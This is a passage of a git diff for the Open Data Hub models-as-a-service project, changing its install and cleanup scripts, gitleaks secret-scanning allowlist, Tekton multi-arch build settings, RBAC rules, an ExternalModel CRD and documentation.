diff --git a/.github/hack/cleanup-odh.sh b/.github/hack/cleanup-odh.sh
index fd14760b3..e665f92b7 100755
--- a/.github/hack/cleanup-odh.sh
+++ b/.github/hack/cleanup-odh.sh
@@ -77,6 +77,10 @@ kubectl delete operatorgroup odh-operator-group -n odh-operator --ignore-not-fou
 echo "7. Deleting odh-operator namespace..."
 kubectl delete ns odh-operator --ignore-not-found --timeout=120s 2>/dev/null || true
 
+# 8. Delete opendatahub namespace (contains deployed components)
+echo "8. Deleting opendatahub namespace..."
+kubectl delete ns opendatahub --ignore-not-found --timeout=120s 2>/dev/null || true
+
 force_delete_namespace() {
     local ns=$1
     shift
@@ -107,10 +111,6 @@ force_delete_namespace() {
     kubectl wait --for=delete namespace/"$ns" --timeout=30s 2>/dev/null || true
 }
 
-# 8. Delete opendatahub namespace (contains deployed components)
-echo "8. Deleting opendatahub namespace..."
-force_delete_namespace "opendatahub" "maasmodelrefs.maas.opendatahub.io"
-
 # 9. Delete models-as-a-service namespace (contains MaaS CRs)
 echo "9. Deleting models-as-a-service namespace..."
 force_delete_namespace "models-as-a-service" \
@@ -120,12 +120,12 @@ force_delete_namespace "models-as-a-service" \
 for policy_ns in kuadrant-system rh-connectivity-link; do
     echo "10. Deleting $policy_ns namespace (if installed)..."
     force_delete_namespace "$policy_ns" \
-    "authorinos.operator.authorino.kuadrat.io" "kuadrants.kuadrant.io" "limitadors.limitador.kuadrant.io"
+    "authorinos.operator.authorino.kuadrant.io" "kuadrants.kuadrant.io" "limitadors.limitador.kuadrant.io"
 done
 
 # 11. Delete llm namespace and model resources
 echo "11. Deleting LLM models and namespace..."
-force_delete_namespace "llm" "llminferenceservice" "inferenceservice"
+force_delete_namespace "llm" "llminferenceservice" "inferenceservice" "maasmodelrefs.maas.opendatahub.io"
 
 # 12. Delete gateway resources in openshift-ingress
 echo "12. Deleting gateway resources..."
diff --git a/.github/hack/install-odh.sh b/.github/hack/install-odh.sh
index 616a7d664..e5dfc59cc 100755
--- a/.github/hack/install-odh.sh
+++ b/.github/hack/install-odh.sh
@@ -5,9 +5,12 @@
 # Prerequisites: cert-manager and LWS operators (run install-cert-manager-and-lws.sh first).
 #
 # Environment variables:
-#   OPERATOR_CATALOG - Custom catalog image (optional). When unset, uses community-operators (ODH 3.3).
+#   OPERATOR_CATALOG - Custom catalog image (optional). When unset, uses community-operators.
 #                      Set to e.g. quay.io/opendatahub/opendatahub-operator-catalog:latest for custom builds.
-#   OPERATOR_CHANNEL - Subscription channel (default: fast-3 for community, fast for custom catalog)
+#   OPERATOR_CHANNEL   - Subscription channel (default: fast-3)
+#   OPERATOR_STARTING_CSV - Pin Subscription startingCSV (default: opendatahub-operator.v3.4.0-ea.1). Set to "-" to omit.
+#   OPERATOR_INSTALL_PLAN_APPROVAL - Manual (default) or Automatic; use "-" to omit.
+#     Manual: blocks auto-upgrades; this script auto-approves only the first InstallPlan so install does not stall.
 #   OPERATOR_IMAGE   - Custom operator image to patch into CSV (optional)
 #
 # Usage: ./install-odh.sh
@@ -21,6 +24,8 @@ DATA_DIR="${REPO_ROOT}/scripts/data"
 NAMESPACE="${OPERATOR_NAMESPACE:-opendatahub}"
 OPERATOR_CATALOG="${OPERATOR_CATALOG:-}"
 OPERATOR_CHANNEL="${OPERATOR_CHANNEL:-}"
+OPERATOR_STARTING_CSV="${OPERATOR_STARTING_CSV:-}"
+OPERATOR_INSTALL_PLAN_APPROVAL="${OPERATOR_INSTALL_PLAN_APPROVAL:-}"
 OPERATOR_IMAGE="${OPERATOR_IMAGE:-}"
 
 # Source deployment helpers
@@ -59,19 +64,27 @@ patch_operator_csv_if_needed() {
 echo "=== Installing OpenDataHub operator ==="
 echo ""
 
-# 1. Catalog setup: use community-operators (ODH 3.3) by default, or custom catalog when OPERATOR_CATALOG is set
+# 1. Catalog setup: community-operators by default, or custom catalog when OPERATOR_CATALOG is set
 echo "1. Setting up ODH catalog..."
 if [[ -n "$OPERATOR_CATALOG" ]]; then
   echo "   Using custom catalog: $OPERATOR_CATALOG"
   create_custom_catalogsource "odh-custom-catalog" "openshift-marketplace" "$OPERATOR_CATALOG"
   catalog_source="odh-custom-catalog"
-  channel="${OPERATOR_CHANNEL:-fast}"
+  channel="${OPERATOR_CHANNEL:-fast-3}"
 else
-  echo "   Using community-operators (ODH 3.3)"
+  echo "   Using community-operators"
   catalog_source="community-operators"
   channel="${OPERATOR_CHANNEL:-fast-3}"
 fi
 
+# Pin to ODH 3.4 EA1 unless overridden (omit with OPERATOR_STARTING_CSV=- to follow channel head)
+starting_csv="${OPERATOR_STARTING_CSV:-opendatahub-operator.v3.4.0-ea.1}"
+[[ "$starting_csv" == "-" ]] && starting_csv=""
+
+# Manual = no auto-upgrades; install_olm_operator still approves the first InstallPlan programmatically
+plan_approval="${OPERATOR_INSTALL_PLAN_APPROVAL:-Manual}"
+[[ "$plan_approval" == "-" ]] && plan_approval=""
+
 # 2. Install ODH operator via OLM
 echo "2. Installing ODH operator..."
 install_olm_operator \
@@ -79,8 +92,10 @@ install_olm_operator \
   "$NAMESPACE" \
   "$catalog_source" \
   "$channel" \
-  "" \
-  "AllNamespaces"
+  "$starting_csv" \
+  "AllNamespaces" \
+  "openshift-marketplace" \
+  "$plan_approval"
 
 # 3. Patch CSV with custom image if specified
 if [[ -n "$OPERATOR_IMAGE" ]]; then
diff --git a/.github/hack/uninstall-leader-worker-set.sh b/.github/hack/uninstall-leader-worker-set.sh
deleted file mode 100755
index d41cc795f..000000000
--- a/.github/hack/uninstall-leader-worker-set.sh
+++ /dev/null
@@ -1,60 +0,0 @@
-#!/usr/bin/env bash
-# Completely remove the LeaderWorkerSet (LWS) operator from the cluster.
-#
-# Prerequisites: oc/kubectl with cluster-admin
-# Usage: ./hack/uninstall-leader-worker-set.sh
-
-set -euo pipefail
-
-echo "========================================="
-echo "Uninstalling LeaderWorkerSet operator"
-echo "========================================="
-echo ""
-
-# 1. Delete all LeaderWorkerSet CRs (operator creates these for LLMInferenceService multi-node)
-echo "1. Deleting LeaderWorkerSet resources..."
-if oc get leaderworkerset -A --no-headers 2>/dev/null | grep -q .; then
-  oc delete leaderworkerset -A --all --timeout=120s --ignore-not-found=true || true
-  echo "   Waiting for LeaderWorkerSet cleanup..."
-  sleep 5
-else
-  echo "   No LeaderWorkerSet resources found"
-fi
-
-# 2. Delete LeaderWorkerSetOperator CR
-echo "2. Deleting LeaderWorkerSetOperator CR..."
-oc delete leaderworkersetoperator cluster -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true
-
-# 3. Delete Subscription
-echo "3. Deleting LWS Subscription..."
-oc delete subscription leader-worker-set -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true
-
-# 4. Delete CSV (by label or name prefix)
-echo "4. Deleting LWS CSV..."
-for csv in $(oc get csv -n openshift-lws-operator --no-headers 2>/dev/null | grep -E 'leader-worker-set|leaderworkerset' | awk '{print $1}'); do
-  oc delete csv "$csv" -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true
-done
-
-# 5. Delete OperatorGroup
-echo "5. Deleting LWS OperatorGroup..."
-oc delete operatorgroup leader-worker-set -n openshift-lws-operator --timeout=60s --ignore-not-found=true || true
-
-# 6. Delete namespace
-echo "6. Deleting openshift-lws-operator namespace..."
-oc delete namespace openshift-lws-operator --timeout=300s --ignore-not-found=true || true
-
-# 7. Delete CRDs (removes the API types entirely)
-echo "7. Deleting LeaderWorkerSet CRDs..."
-oc delete crd leaderworkersets.leaderworkerset.x-k8s.io --timeout=60s --ignore-not-found=true || true
-oc delete crd leaderworkersetoperators.operator.openshift.io --timeout=60s --ignore-not-found=true || true
-
-echo ""
-echo "========================================="
-echo "LeaderWorkerSet operator removed"
-echo "========================================="
-echo ""
-echo "Verify:"
-echo "  oc get subscription,csv,operatorgroup -n openshift-lws-operator"
-echo "  oc get crd | grep leaderworkerset"
-echo "  oc get namespace openshift-lws-operator"
-echo ""
diff --git a/.gitignore b/.gitignore
index 7dd334130..0265312dd 100644
--- a/.gitignore
+++ b/.gitignore
@@ -29,6 +29,7 @@ __pycache__/
 *$py.class
 *.so
 .Python
+.venv/
 env/
 venv/
 ENV/
@@ -37,8 +38,19 @@ venv.bak/
 pip-log.txt
 pip-delete-this-directory.txt
 .coverage
+coverage.xml
 .pytest_cache/
+.mypy_cache/
+.ruff_cache/
+.tox/
 htmlcov/
+
+# Test / build reports
+reports/
+
+# OS / editor cruft
+.DS_Store
+.vscode/
 apps/frontend/.env.local
 apps/backend/.env
 CLAUDE.md
diff --git a/.gitleaks.toml b/.gitleaks.toml
new file mode 100644
index 000000000..2a04f6d0c
--- /dev/null
+++ b/.gitleaks.toml
@@ -0,0 +1,67 @@
+# Gitleaks configuration for opendatahub-io repos
+# Synced from security-config. Do not edit in target repos.
+#
+# Path allowlists use Go regex syntax.
+# Real credentials should NEVER be committed to any repository.
+
+[extend]
+  useDefault = true
+
+[allowlist]
+  description = "Exclude test fixtures, mock data, sample configs, and CI resources"
+  paths = [
+    # Go test files (commonly contain mock credentials)
+    '''.*_test\.go$''',
+
+    # JS/TS test files (.spec.ts, .test.tsx, etc.)
+    '''.*\.spec\.(ts|tsx|js|jsx)$''',
+    '''.*\.test\.(ts|tsx|js|jsx)$''',
+
+    # JS/TS test directories
+    '''__tests__/''',
+
+    # Go testdata directories
+    '''testdata/''',
+
+    # Python test data directories
+    '''test_data/''',
+
+    # Test fixtures
+    '''fixtures/''',
+
+    # JavaScript/TypeScript mocks
+    '''__mocks__/''',
+
+    # Go/Java/TS mock directories
+    '''mocks/''',
+    '''k8mocks/''',
+
+    # Sample and example configs with placeholder credentials
+    '''docs/samples/''',
+    '''config/samples/''',
+    '''config/overlays/test/''',
+
+    # CI/GitHub Actions test resources
+    '''\.github/resources/''',
+
+    # E2E test credentials
+    '''test/e2e/credentials/''',
+    '''tests/e2e/credentials/''',
+
+    # OpenShift CI sample resources
+    '''openshift-ci/resources/samples/''',
+
+    # Cypress test data
+    '''cypress/fixtures/''',
+    '''cypress/tests/mocked/''',
+
+    # Test certificate and key files
+    '''tests/data/.*\.(pem|crt|key)$''',
+  ]
+
+  # Known test/placeholder credentials used in documentation and tests
+  regexes = [
+    '''database-password\s*:\s*"?(The)?BlurstOfTimes"?''',
+    '''database-user\s*:\s*"?mlmduser"?''',
+    '''database-user\s*:\s*"?modelregistryuser"?''',
+  ]
diff --git a/.gitleaksignore b/.gitleaksignore
new file mode 100644
index 000000000..e2d509a42
--- /dev/null
+++ b/.gitleaksignore
@@ -0,0 +1,5 @@
+# Gitleaks ignore file
+# Add false positive fingerprints below (one per line)
+# Format: commit:file:rule-id:line or file:rule-id:line
+#
+# For path-based exclusions, use .gitleaks.toml allowlist instead.
diff --git a/.tekton/odh-maas-api-pull-request.yaml b/.tekton/odh-maas-api-pull-request.yaml
index dd7127774..0f5d1adc9 100644
--- a/.tekton/odh-maas-api-pull-request.yaml
+++ b/.tekton/odh-maas-api-pull-request.yaml
@@ -29,6 +29,12 @@ spec:
     value: maas-api/Dockerfile
   - name: path-context
     value: maas-api
+  - name: build-platforms
+    value:
+    - linux/x86_64
+    - linux/arm64
+    - linux/ppc64le
+    - linux/s390x
   - name: additional-tags
     value:
     - 'odh-pr-{{revision}}'
diff --git a/.tekton/odh-maas-api-push.yaml b/.tekton/odh-maas-api-push.yaml
index f4892c604..67b015c77 100644
--- a/.tekton/odh-maas-api-push.yaml
+++ b/.tekton/odh-maas-api-push.yaml
@@ -28,6 +28,12 @@ spec:
     value: maas-api/Dockerfile
   - name: path-context
     value: maas-api
+  - name: build-platforms
+    value:
+    - linux/x86_64
+    - linux/arm64
+    - linux/ppc64le
+    - linux/s390x
   pipelineRef:
     resolver: git
     params:
diff --git a/.tekton/odh-maas-controller-pull-request.yaml b/.tekton/odh-maas-controller-pull-request.yaml
index d7d757cc2..fbfe43b96 100644
--- a/.tekton/odh-maas-controller-pull-request.yaml
+++ b/.tekton/odh-maas-controller-pull-request.yaml
@@ -34,6 +34,12 @@ spec:
     - 'odh-pr-{{revision}}'
   - name: pipeline-type
     value: pull-request
+  - name: build-platforms
+    value:
+    - linux/x86_64
+    - linux/arm64
+    - linux/ppc64le
+    - linux/s390x
   pipelineRef:
     resolver: git
     params:
diff --git a/.tekton/odh-maas-controller-push.yaml b/.tekton/odh-maas-controller-push.yaml
index 8f882f415..3eab7ab1e 100644
--- a/.tekton/odh-maas-controller-push.yaml
+++ b/.tekton/odh-maas-controller-push.yaml
@@ -28,6 +28,12 @@ spec:
     value: Dockerfile
   - name: path-context
     value: maas-controller
+  - name: build-platforms
+    value:
+    - linux/x86_64
+    - linux/arm64
+    - linux/ppc64le
+    - linux/s390x
   pipelineRef:
     resolver: git
     params:
diff --git a/OWNERS b/OWNERS
index c9c440f1b..fab047100 100644
--- a/OWNERS
+++ b/OWNERS
@@ -4,6 +4,7 @@ approvers:
   - chaitanya1731
   - nerdalert
   - jland-redhat
+  - nirrozenbaum
   - dmytro-zaharnytskyi
   - SB159
   - noyitz
@@ -21,6 +22,7 @@ reviewers:
   - chaitanya1731
   - nerdalert
   - jland-redhat
+  - nirrozenbaum
   - dmytro-zaharnytskyi
   - SB159
   - noyitz
diff --git a/README.md b/README.md
index 9231fbbcb..d5d9dcb0e 100644
--- a/README.md
+++ b/README.md
@@ -59,12 +59,9 @@ For detailed instructions, see the [Deployment Guide](docs/content/quickstart.md
 |------|--------|---------|-------------|
 | `--deployment-mode` | `operator`, `kustomize` | `operator` | Deployment method |
 | `--operator-type` | `rhoai`, `odh` | `rhoai` | Which operator to install |
-| `--policy-engine` | `rhcl`, `kuadrant` | auto | Gateway policy engine (rhcl for operators, kuadrant for kustomize) |
 | `--enable-tls-backend` | flag | enabled | TLS for Authorino ↔ MaaS API |
-| `--skip-certmanager` | flag | auto-detect | Skip cert-manager installation |
-| `--skip-lws` | flag | auto-detect | Skip LeaderWorkerSet installation |
+| `--disable-tls-backend` | flag | `false` | Disable TLS backend |
 | `--namespace` | string | auto | Target namespace |
-| `--timeout` | seconds | `300` | Operation timeout |
 | `--verbose` | flag | false | Enable debug logging |
 | `--dry-run` | flag | false | Show plan without executing |
 | `--help` | flag | - | Display full help |
@@ -82,14 +79,16 @@ For detailed instructions, see the [Deployment Guide](docs/content/quickstart.md
 | Variable | Description | Example |
 |----------|-------------|---------|
 | `MAAS_API_IMAGE` | Custom MaaS API container image (works in both operator and kustomize modes) | `quay.io/user/maas-api:pr-123` |
+| `MAAS_CONTROLLER_IMAGE` | Custom MaaS controller container image | `quay.io/user/maas-controller:pr-123` |
 | `OPERATOR_CATALOG` | Custom operator catalog | `quay.io/opendatahub/catalog:pr-456` |
 | `OPERATOR_IMAGE` | Custom operator image | `quay.io/opendatahub/operator:pr-456` |
 | `OPERATOR_TYPE` | Operator type (rhoai/odh) | `odh` |
-| `POLICY_ENGINE` | Policy engine (rhcl/kuadrant) | `kuadrant` |
 | `LOG_LEVEL` | Logging verbosity | `DEBUG`, `INFO`, `WARN`, `ERROR` |
 
 **Note:** TLS backend is enabled by default. Use `--disable-tls-backend` to disable.
 
+**Note:** The policy engine is auto-determined based on operator type (`rhcl` for RHOAI, `kuadrant` for ODH/kustomize) and does not need to be set manually.
+
 ### Deployment Examples
 
 #### Standard Deployments
@@ -119,9 +118,6 @@ MAAS_API_IMAGE=quay.io/myuser/maas-api:pr-123 \
 #### Minimal Deployments
 
 ```bash
-# Skip optional operators (if already installed)
-./scripts/deploy.sh --skip-certmanager --skip-lws
-
 # Deploy without TLS backend (HTTP tier lookup)
 ./scripts/deploy.sh --disable-tls-backend
 ```
diff --git a/deployment/base/maas-api/core/deployment.yaml b/deployment/base/maas-api/core/deployment.yaml
index fa459843b..3124bc103 100644
--- a/deployment/base/maas-api/core/deployment.yaml
+++ b/deployment/base/maas-api/core/deployment.yaml
@@ -24,6 +24,8 @@ spec:
               fieldPath: metadata.namespace
         - name: SECURE
           value: "false"
+        - name: MAAS_SUBSCRIPTION_NAMESPACE
+          value: "models-as-a-service"
         resources:
           requests:
             memory: "64Mi"
diff --git a/deployment/base/maas-api/policies/auth-policy.yaml b/deployment/base/maas-api/policies/auth-policy.yaml
index 518861575..2e2bb04b5 100644
--- a/deployment/base/maas-api/policies/auth-policy.yaml
+++ b/deployment/base/maas-api/policies/auth-policy.yaml
@@ -29,7 +29,10 @@ spec:
         when:
           - predicate: request.headers.authorization.startsWith("Bearer sk-oai-")
         http:
-          url: https://maas-api.opendatahub.svc.cluster.local:8443/internal/v1/api-keys/validate
+          # Placeholder URL - gets patched based on deployment mode:
+          #   - Operator mode (ODH/RHOAI): ODH overlay replacement (app-namespace param)
+          #   - Kustomize mode: deploy.sh script patches with $NAMESPACE via sed
+          url: https://maas-api.placehold.svc.cluster.local:8443/internal/v1/api-keys/validate
           method: POST
           contentType: application/json
           body:
@@ -79,3 +82,12 @@ spec:
               selector: auth.identity.user.groups.@tostr
             key: X-MaaS-Group
             priority: 1
+          # Subscription: from API key validation (when API key with subscription used)
+          # This header is used by /v1/models to determine which subscription's models to return
+          X-MaaS-Subscription:
+            when:
+              - predicate: request.headers.authorization.startsWith("Bearer sk-oai-")
+              - predicate: auth.metadata.apiKeyValidation.subscription != ""
+            plain:
+              selector: auth.metadata.apiKeyValidation.subscription
+            priority: 0
diff --git a/deployment/base/maas-api/rbac/clusterrole.yaml b/deployment/base/maas-api/rbac/clusterrole.yaml
index c053efcfb..d1f1cbfca 100644
--- a/deployment/base/maas-api/rbac/clusterrole.yaml
+++ b/deployment/base/maas-api/rbac/clusterrole.yaml
@@ -30,6 +30,11 @@ rules:
   resources: ["tokenreviews"]
   verbs: ["create"]
 
+# Subject access review for admin authorization (SAR-based admin check)
+- apiGroups: ["authorization.k8s.io"]
+  resources: ["subjectaccessreviews"]
+  verbs: ["create"]
+
 # MaaS CRs for the models endpoint and subscription selector (cached via informer)
 - apiGroups: ["maas.opendatahub.io"]
   resources: ["maasmodelrefs", "maassubscriptions"]
diff --git a/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_externalmodels.yaml b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_externalmodels.yaml
new file mode 100644
index 000000000..214e6c921
--- /dev/null
+++ b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_externalmodels.yaml
@@ -0,0 +1,164 @@
+---
+apiVersion: apiextensions.k8s.io/v1
+kind: CustomResourceDefinition
+metadata:
+  annotations:
+    controller-gen.kubebuilder.io/version: v0.16.4
+  name: externalmodels.maas.opendatahub.io
+spec:
+  group: maas.opendatahub.io
+  names:
+    kind: ExternalModel
+    listKind: ExternalModelList
+    plural: externalmodels
+    singular: externalmodel
+  scope: Namespaced
+  versions:
+  - additionalPrinterColumns:
+    - jsonPath: .spec.provider
+      name: Provider
+      type: string
+    - jsonPath: .spec.endpoint
+      name: Endpoint
+      type: string
+    - jsonPath: .status.phase
+      name: Phase
+      type: string
+    - jsonPath: .metadata.creationTimestamp
+      name: Age
+      type: date
+    name: v1alpha1
+    schema:
+      openAPIV3Schema:
+        description: |-
+          ExternalModel is the Schema for the externalmodels API.
+          It defines an external LLM provider (e.g., OpenAI, Anthropic) that can be
+          referenced by MaaSModelRef resources.
+        properties:
+          apiVersion:
+            description: |-
+              APIVersion defines the versioned schema of this representation of an object.
+              Servers should convert recognized schemas to the latest internal value, and
+              may reject unrecognized values.
+              More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources
+            type: string
+          kind:
+            description: |-
+              Kind is a string value representing the REST resource this object represents.
+              Servers may infer this from the endpoint the client submits requests to.
+              Cannot be updated.
+              In CamelCase.
+              More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
+            type: string
+          metadata:
+            type: object
+          spec:
+            description: ExternalModelSpec defines the desired state of ExternalModel
+            properties:
+              credentialRef:
+                description: |-
+                  CredentialRef references a Kubernetes Secret containing the provider API key.
+                  The Secret must contain a data key "api-key" with the credential value.
+                properties:
+                  name:
+                    description: Name is the name of the Secret
+                    maxLength: 253
+                    minLength: 1
+                    type: string
+                required:
+                - name
+                type: object
+              endpoint:
+                description: |-
+                  Endpoint is the FQDN of the external provider (no scheme or path).
+                  e.g. "api.openai.com".
+                  This field is metadata for downstream consumers (e.g. BBR provider-resolver plugin)
+                  and is not used by the controller for endpoint derivation.
+                maxLength: 253
+                pattern: ^[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9\-]*[a-zA-Z0-9])?)*$
+                type: string
+              provider:
+                description: |-
+                  Provider identifies the API format and auth type for the external model.
+                  e.g. "openai", "anthropic".
+                maxLength: 63
+                type: string
+            required:
+            - credentialRef
+            - endpoint
+            - provider
+            type: object
+          status:
+            description: ExternalModelStatus defines the observed state of ExternalModel
+            properties:
+              conditions:
+                description: Conditions represent the latest available observations
+                  of the external model's state
+                items:
+                  description: Condition contains details for one aspect of the current
+                    state of this API Resource.
+                  properties:
+                    lastTransitionTime:
+                      description: |-
+                        lastTransitionTime is the last time the condition transitioned from one status to another.
+                        This should be when the underlying condition changed.  If that is not known, then using the time when the API field changed is acceptable.
+                      format: date-time
+                      type: string
+                    message:
+                      description: |-
+                        message is a human readable message indicating details about the transition.
+                        This may be an empty string.
+                      maxLength: 32768
+                      type: string
+                    observedGeneration:
+                      description: |-
+                        observedGeneration represents the .metadata.generation that the condition was set based upon.
+                        For instance, if .metadata.generation is currently 12, but the .status.conditions[x].observedGeneration is 9, the condition is out of date
+                        with respect to the current state of the instance.
+                      format: int64
+                      minimum: 0
+                      type: integer
+                    reason:
+                      description: |-
+                        reason contains a programmatic identifier indicating the reason for the condition's last transition.
+                        Producers of specific condition types may define expected values and meanings for this field,
+                        and whether the values are considered a guaranteed API.
+                        The value should be a CamelCase string.
+                        This field may not be empty.
+                      maxLength: 1024
+                      minLength: 1
+                      pattern: ^[A-Za-z]([A-Za-z0-9_,:]*[A-Za-z0-9_])?$
+                      type: string
+                    status:
+                      description: status of the condition, one of True, False, Unknown.
+                      enum:
+                      - "True"
+                      - "False"
+                      - Unknown
+                      type: string
+                    type:
+                      description: type of condition in CamelCase or in foo.example.com/CamelCase.
+                      maxLength: 316
+                      pattern: ^([a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*/)?(([A-Za-z0-9][-A-Za-z0-9_.]*)?[A-Za-z0-9])$
+                      type: string
+                  required:
+                  - lastTransitionTime
+                  - message
+                  - reason
+                  - status
+                  - type
+                  type: object
+                type: array
+              phase:
+                description: Phase represents the current phase of the external model
+                enum:
+                - Pending
+                - Ready
+                - Failed
+                type: string
+            type: object
+        type: object
+    served: true
+    storage: true
+    subresources:
+      status: {}
diff --git a/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml
index 58cdaeb13..3d8b5b904 100644
--- a/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml
+++ b/deployment/base/maas-controller/crd/bases/maas.opendatahub.io_maasmodelrefs.yaml
@@ -65,13 +65,21 @@ spec:
                 description: ModelRef references the actual model endpoint
                 properties:
                   kind:
-                    description: Kind determines which fields are available
+                    description: |-
+                      Kind determines which backend handles this model reference.
+                      LLMInferenceService: references a KServe LLMInferenceService.
+                      ExternalModel: references an ExternalModel CR containing provider config.
                     enum:
                     - LLMInferenceService
                     - ExternalModel
                     type: string
                   name:
-                    description: Name is the name of the model resource
+                    description: |-
+                      Name is the name of the model resource.
+                      For LLMInferenceService, this is the InferenceService name.
+                      For ExternalModel, this is the ExternalModel CR name.
+                    maxLength: 253
+                    minLength: 1
                     type: string
                 required:
                 - kind
diff --git a/deployment/base/maas-controller/crd/kustomization.yaml b/deployment/base/maas-controller/crd/kustomization.yaml
index be88931e7..8fca2319c 100644
--- a/deployment/base/maas-controller/crd/kustomization.yaml
+++ b/deployment/base/maas-controller/crd/kustomization.yaml
@@ -1,5 +1,6 @@
 # This kustomization.yaml is used for CRD generation.
 resources:
+  - bases/maas.opendatahub.io_externalmodels.yaml
   - bases/maas.opendatahub.io_maasauthpolicies.yaml
   - bases/maas.opendatahub.io_maasmodelrefs.yaml
   - bases/maas.opendatahub.io_maassubscriptions.yaml
diff --git a/deployment/base/maas-controller/rbac/clusterrole.yaml b/deployment/base/maas-controller/rbac/clusterrole.yaml
index 1dbff7900..2c8cfef64 100644
--- a/deployment/base/maas-controller/rbac/clusterrole.yaml
+++ b/deployment/base/maas-controller/rbac/clusterrole.yaml
@@ -4,13 +4,13 @@ metadata:
   name: maas-controller-role
 rules:
 - apiGroups: ["maas.opendatahub.io"]
-  resources: ["maasauthpolicies", "maasmodelrefs", "maassubscriptions"]
+  resources: ["externalmodels", "maasauthpolicies", "maasmodelrefs", "maassubscriptions"]
   verbs: ["create", "delete", "get", "list", "patch", "update", "watch"]
 - apiGroups: ["maas.opendatahub.io"]
-  resources: ["maasauthpolicies/finalizers", "maasmodelrefs/finalizers", "maassubscriptions/finalizers"]
+  resources: ["externalmodels/finalizers", "maasauthpolicies/finalizers", "maasmodelrefs/finalizers", "maassubscriptions/finalizers"]
   verbs: ["update"]
 - apiGroups: ["maas.opendatahub.io"]
-  resources: ["maasauthpolicies/status", "maasmodelrefs/status", "maassubscriptions/status"]
+  resources: ["externalmodels/status", "maasauthpolicies/status", "maasmodelrefs/status", "maassubscriptions/status"]
   verbs: ["get", "patch", "update"]
 - apiGroups: ["gateway.networking.k8s.io"]
   resources: ["gateways"]
@@ -24,3 +24,6 @@ rules:
 - apiGroups: ["serving.kserve.io"]
   resources: ["llminferenceservices"]
   verbs: ["get", "list", "watch"]
+- apiGroups: [""]
+  resources: ["namespaces"]
+  verbs: ["create", "get", "list", "watch"]
diff --git a/deployment/overlays/odh/kustomization.yaml b/deployment/overlays/odh/kustomization.yaml
index 7218fcc83..50cc3ca34 100644
--- a/deployment/overlays/odh/kustomization.yaml
+++ b/deployment/overlays/odh/kustomization.yaml
@@ -125,6 +125,14 @@ replacements:
     name: maas-parameters
     fieldPath: data.app-namespace
   targets:
+  - select:
+      kind: AuthPolicy
+      name: maas-api-auth-policy
+    fieldPaths:
+    - spec.rules.metadata.apiKeyValidation.http.url
+    options:
+      delimiter: "."
+      index: 1
   - select:
       kind: DestinationRule
       name: maas-api-backend-tls
@@ -133,3 +141,13 @@ replacements:
     options:
       delimiter: "."
       index: 1
+  - select:
+      kind: ClusterRoleBinding
+      name: maas-controller-rolebinding
+    fieldPaths:
+    - subjects.0.namespace
+  - select:
+      kind: RoleBinding
+      name: maas-controller-leader-election-rolebinding
+    fieldPaths:
+    - subjects.0.namespace
diff --git a/deployment/overlays/tls-backend/README.md b/deployment/overlays/tls-backend/README.md
index 395de51e7..7d1fcc00d 100644
--- a/deployment/overlays/tls-backend/README.md
+++ b/deployment/overlays/tls-backend/README.md
@@ -7,7 +7,8 @@ Enables end-to-end TLS for maas-api using OpenShift serving certificates.
 | File | Purpose |
 |------|---------|
 | `kustomization.yaml` | References base TLS overlay and policies, applies HTTPS patches |
-| `configure-authorino-tls.sh` | Configures Authorino TLS settings and CA bundle for HTTPS tier lookup |
+
+Authorino TLS is configured by `scripts/setup-authorino-tls.sh` (run automatically by `deploy.sh` or manually).
 
 
 ## Traffic Flow
@@ -38,7 +39,7 @@ Authorino → maas-api :8443 → /v1/tiers/lookup
 
 The deployment script automatically:
 1. Applies the kustomize overlay
-2. Configures Authorino for TLS using `configure-authorino-tls.sh`
+2. Configures Authorino for TLS using `scripts/setup-authorino-tls.sh`
 3. Restarts deployments to pick up certificates
 
 ### Manual Deployment (Advanced)
@@ -48,13 +49,15 @@ The deployment script automatically:
 kustomize build deployment/overlays/tls-backend | kubectl apply -f -
 
 # Configure Authorino for TLS (operator-managed, can't be patched via Kustomize)
-./deployment/overlays/tls-backend/configure-authorino-tls.sh
+./scripts/setup-authorino-tls.sh
 
 # Restart to pick up certificates
 kubectl rollout restart deployment/maas-api -n maas-api
 kubectl rollout restart deployment/authorino -n kuadrant-system
 ```
 
+**Note:** `scripts/setup-authorino-tls.sh` patches Authorino's service, CR, and deployment. Use `--disable-tls-backend` with `deploy.sh` to skip if you manage Authorino TLS separately.
+
 ## Why the script?
 
 Authorino resources are managed by the Kuadrant operator. Kustomize can't patch them because they don't exist in our manifests; they're created by the operator. The script uses `kubectl patch` to configure TLS on the live resources.
diff --git a/docs/REMINDER-openshift-ai-inference.md b/docs/REMINDER-openshift-ai-inference.md
new file mode 100644
index 000000000..5ee7ecc71
--- /dev/null
+++ b/docs/REMINDER-openshift-ai-inference.md
@@ -0,0 +1,22 @@
+# Reminder: openshift-ai-inference Gateway Removed from Docs
+
+**Date:** 2026-03-08
+
+The `openshift-ai-inference` Gateway was removed from the [MaaS setup documentation](content/install/maas-setup.md) because it was believed to be unnecessary for the current version.
+
+**What was removed:**
+- The YAML block that created the `openshift-ai-inference` Gateway (in `openshift-ingress` namespace)
+- The Gateway Architecture info note that described the segregated gateway approach
+
+**If you find out later that openshift-ai-inference IS needed**, restore it by:
+
+1. Re-adding the Gateway YAML to `docs/content/install/maas-setup.md` in the "Create Gateway" section, before the maas-default-gateway block
+2. Re-adding the Gateway Architecture info note
+
+The original content was:
+- Gateway name: `openshift-ai-inference`
+- Namespace: `openshift-ingress`
+- Infrastructure label: `serving.kserve.io/gateway: kserve-ingress-gateway`
+- Purpose: Standard KServe inference (vs maas-default-gateway for token auth and rate limiting)
+
+**Reference:** The Gateway is still defined in `deployment/base/networking/odh/odh-gateway-api.yaml` if needed for kustomize deployments.
diff --git a/docs/content/advanced-administration/observability.md b/docs/content/advanced-administration/observability.md
